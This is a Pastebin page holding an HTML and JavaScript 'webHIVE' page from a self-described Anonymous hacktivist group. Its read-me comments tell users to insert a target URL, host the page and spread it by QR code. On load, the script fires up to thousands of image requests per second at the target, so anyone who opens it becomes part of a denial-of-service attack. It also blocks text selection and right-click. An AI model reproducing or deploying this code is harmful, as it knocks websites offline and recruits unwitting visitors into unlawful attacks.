Advertisement
Anon-T

The basic webHIVE Code

Jan 28th, 2013
1,382
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 6.08 KB | None | 0 0
  1. <!--Read Me-->
  2. <!--First you must read this befor, This code for open source to share the #Ops you can build the target by youself.
  3. remember to make the QR-Code to share to you friends with any method, whatsapp, Facebook, Twitter, etc.<br />
  4. thx for support to change the world......-->
  5. <!-- by the following you need to change the target.</br>
  6. 1. make a search with this code, [http://www.example.com/] (there have to part you need to correct) and change the target domain or IP and save as a different HTML file name<br />
  7. 2. copy you code develop to the pastehtml -http://www.pastehtml.com- then save the url after your post.<br />
  8. 3. share the url with you friends or make the QR-Code by online web apps.<br />
  9. 4. have fun keep on the time and call all the legion to make a good show!
  10. -->
  11. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  12. <html xmlns="http://www.w3.org/1999/xhtml">
  13. <head>
  14. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  15. <title>[#Ops] -- [HACKITVIST]</title>
  16. <style type="text/css">
  17. body {
  18. background: url("http://dl.dropbox.com/u/29637731/H4X0R3D/background.png");
  19. background-repeat: repeat;
  20. background-position: right;
  21. background-attachment: fixed;
  22. margin-top: 5%;
  23. margin-bottom: 5%;
  24. margin-left: 15%;
  25. margin-right: 15%;
  26. font-family:"Courier New", Courier, monospace;
  27. color: #808080;
  28. }
  29. fieldset {
  30. border-style: none;
  31. margin: 10px;
  32. }
  33. p {
  34. margin: 0;
  35. }
  36. input {
  37. margin: 0;
  38. background-color: transparent;
  39. border: none;
  40. text-align: center;
  41. font-family:"Courier New", Courier, monospace;
  42. color: #808080;
  43. }
  44. </style>
  45. <script language="JavaScript">
  46. <!-- Disable
  47. function disableselect(e){
  48. return false
  49. }
  50. function reEnable(){
  51. return true
  52. }
  53. //if IE4+
  54. document.onselectstart=new Function ("return false")
  55. document.oncontextmenu=new Function ("return false")
  56. //if NS6
  57. if (window.sidebar){
  58. document.onmousedown=disableselect
  59. document.onclick=reEnable
  60. }
  61. //-->
  62. </script>
  63. </head>
  64. <body onLoad="type()">
  65. <fieldset>
  66. <div id="title" align="center"><font size="+3" color="#FF0000">[</font><font size="+3"></font><font size="+3" color="#FF0000">#</font><font size="+3">Ops</font><font size="+3" color="#FF0000">]<br /> -- <br />[</font><font size="+3">Dev By Messiah-T</font><font size="+3" color="#FF0000">]</font></div>
  67. <br>
  68. <div class="statement" align="center">
  69. <h3>Anonymous Asian</h3>
  70. <p>Greeting Citizen Of The World</p>
  71. <p>We are Anonymous</p><br />
  72. <p>Begin Anonymous Hackitvist doesn't means you are the hacker or crime</p><br />
  73. <p>You are join the #Ops to saving the world, that is your choose<br />
  74. Sure also start up this site for 30min you are joining the following #Ops and the cyber protest.</p><br />
  75. <p>We Are Legion</p>
  76. <p>We Do Not Forget</p>
  77. <p>We Do Not Forgive</p>
  78. <p>Expect Us</p>
  79. </div>
  80. <div id="hive" align="center">
  81. <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
  82. <input name="target" id="target" size="100" value="http://www.example.com/"><br><br>
  83. <font color="#FF0000">[</font>REQUESTS<font color="#FF0000">]</font><br>
  84. <input id="requests" size="100" value="9999"><br><br>
  85. <font color="#FF0000">[</font>MESSAGE<font color="#FF0000">]</font><br>
  86. <input id="message" size="100" value="We are Hackitvist"><br><br>
  87. <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
  88.  
  89. REQUESTS <p id="requested">0</p>
  90. SUCCEDED <p id="succeeded">0</p>
  91. FAILED <p id="failed">0</p><br>
  92. <button id="fire" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255); display:none;"> STOP! </button><br><br><br>
  93. </div>
  94. <script>
  95. (function () {
  96. var fireInterval;
  97. var isFiring = false;
  98. var currentTime = new Date();
  99. var lastSuccess = currentTime.getTime();
  100.  
  101. var requestedNode = document.getElementById("requested"),
  102. succeededNode = document.getElementById("succeeded"),
  103. failedNode = document.getElementById("failed"),
  104. targetNode = document.getElementById("target"),
  105. fire = document.getElementById("fire"),
  106. messageNode = document.getElementById("message"),
  107. requestsNode = document.getElementById("requests"),
  108. timeoutNode = document.getElementById("timeout");
  109.  
  110. var target = targetNode.value;
  111. targetNode.onchange = function () {
  112. target = this.value;
  113. };
  114.  
  115. var requestsHT = {};
  116.  
  117. var requested = 0,
  118. succeeded = 0,
  119. failed = 0;
  120.  
  121. var makeHttpRequest = function () {
  122. if ( (currentTime.getTime()-lastSuccess) > 10000) {
  123. return;
  124. } else {
  125. lastSuccess = currentTime.getTime();
  126. };
  127.  
  128. var rID =Number(new Date());
  129.  
  130. var img = new Image();
  131. img.onerror = function () { onFail(rID); };
  132. img.onabort = function () { onFail(rID); };
  133. img.onload = function () { onSuccess(rID); };
  134. img.setAttribute("src", target + "?id=" + rID + "&msg=" + messageNode.value);
  135. requestsHT[rID] = img;
  136. onRequest(rID);
  137. };
  138.  
  139. var onRequest = function (rID) {
  140. requested++;
  141. requestedNode.innerHTML = requested;
  142. };
  143.  
  144. var onComplete = function (rID) {
  145. delete requestsHT[rID];
  146. };
  147.  
  148. var onFail = function (rID) {
  149. // failedCtr++;
  150. //failedCtrNode.innerHTML = failedCtr;
  151. succeeded++; //Seems like the url will always fail it it isn't an image
  152. succeededNode.innerHTML = succeeded;
  153. delete requestsHT[rID];
  154. };
  155.  
  156. var onSuccess = function (rID) {
  157. succeeded++;
  158. succeededNode.innerHTML = succeeded;
  159. delete requestsHT[rID];
  160. };
  161.  
  162. fire.onclick = function () {
  163. if (isFiring) {
  164. clearInterval(fireInterval);
  165. isFiring = false;
  166. this.innerHTML = "FIRE!";
  167. } else {
  168. isFiring = true;
  169. this.innerHTML = "STOP!";
  170. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  171. }
  172. };
  173.  
  174. function start() {
  175. if (isFiring) {
  176. clearInterval(fireInterval);
  177. isFiring = false;
  178. this.innerHTML = "FIRE!";
  179. } else {
  180. isFiring = true;
  181. this.innerHTML = "STOP";
  182. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  183. }
  184. };
  185. document.getElementById("target").value = "http://www.example.com/";
  186. start();
  187. })();
  188. </script>
  189. <div id="footer" align="center"><font color="#FF0000"># [</font>Anon-T<font color="#FF0000">] -- [</font>ANONYMOUS HACK TEAM<font color="#FF0000"> ] #</font></div>
  190.  
  191. </fieldset>
  192. </body>
  193. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement